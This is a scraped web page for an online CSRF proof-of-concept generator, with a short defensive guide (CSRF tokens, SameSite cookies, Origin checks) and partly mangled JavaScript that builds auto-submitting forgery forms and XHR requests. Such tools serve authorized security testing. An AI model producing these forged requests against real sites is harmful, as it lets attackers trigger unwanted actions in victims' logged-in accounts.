free security tools
← Back to tools

CSRF PoC Generator

Generate cross-site request forgery proof-of-concept HTML forms. Configure the target endpoint, method, parameters, and encoding. Click Generate to produce the HTML, then copy and save it as poc.html. Use only on authorized targets.

Generated HTML

<!-- Configure the form above and click Generate -->

What is CSRF PoC Generator?

Generate HTML proof-of-concept forms for testing CSRF vulnerabilities. Create auto-submitting forms with custom parameters.

Security Guide

Cross-Site Request Forgery (CSRF)
Use CSRF tokens on all state-changing forms — validate on every request → Web Auditor
CSRF tokens
Add unique, unpredictable tokens to all state-changing forms
SameSite cookies
Set SameSite=Lax or Strict on session cookies
Origin/Referer validation
Validate Origin and Referer headers server-side
Sensitive action protection
Require re-auth for sensitive actions (password/email change, fund transfer)
Custom request headers
Use custom headers for AJAX/API — browsers block cross-origin custom headers
'); lines.push(''); if (method === 'GET') { var query = params.map(function(p) { return encodeURIComponent(p.key) + '=' + encodeURIComponent(p.value); }).join('&'); var fullUrl = url + (query ? (url.includes('?') ? '&' : '?') + query : ''); lines.push(' Click to trigger CSRF'); if (autosubmit) { lines.push(' document.getElementById(\'poc-link\').click();<' + '/script>'); } } else if (encoding === 'json' || encoding === 'plain') { lines.push(' '); lines.push(' var xhr = new XMLHttpRequest();'); lines.push(' xhr.open("' + method + '", "' + escapeHtmlPoC(url) + '", true);'); var ct = encoding === 'json' ? 'application/json' : 'text/plain'; lines.push(' xhr.setRequestHeader("Content-Type", "' + ct + '");'); if (headersRaw) { headersRaw.split('\n').forEach(function(h) { h = h.trim(); if (h) { var sep = h.indexOf(':'); if (sep > 0) lines.push(' xhr.setRequestHeader("' + escapeJsStr(h.slice(0, sep).trim()) + '", "' + escapeJsStr(h.slice(sep + 1).trim()) + '");'); } }); } if (encoding === 'json') { var jsonObj = {}; params.forEach(function(p) { jsonObj[p.key] = p.value; }); lines.push(' xhr.send(\'' + escapeJsStr(JSON.stringify(jsonObj)) + '\');'); } else { var textBody = params.map(function(p) { return p.key + '=' + p.value; }).join('&'); lines.push(' xhr.send(\'' + escapeJsStr(textBody) + '\');'); } lines.push(' <' + '/script>'); } else { // urlencoded or multipart — use HTML form lines.push('
'); params.forEach(function(p) { lines.push(' '); }); if (autosubmit) { lines.push(' document.forms[0].submit();<' + '/script>'); } else { lines.push(' '); } lines.push(' '); if (headersRaw) { lines.push(' '); } } lines.push(''); lines.push(''); var html = lines.join('\n'); document.getElementById('poc-output').innerHTML = '
' + escapeHtmlPoC(html) + '
'; } function copyPoC() { var text = document.getElementById('poc-output').querySelector('pre').textContent; navigator.clipboard.writeText(text).then(function() { var btn = document.querySelector('.copy-btn'); btn.textContent = '✓ Copied!'; setTimeout(function() { btn.textContent = '📋 Copy to clipboard'; }, 2000); }).catch(function() { var ta = document.createElement('textarea'); ta.value = text; document.body.appendChild(ta); ta.select(); document.execCommand('copy'); document.body.removeChild(ta); }); }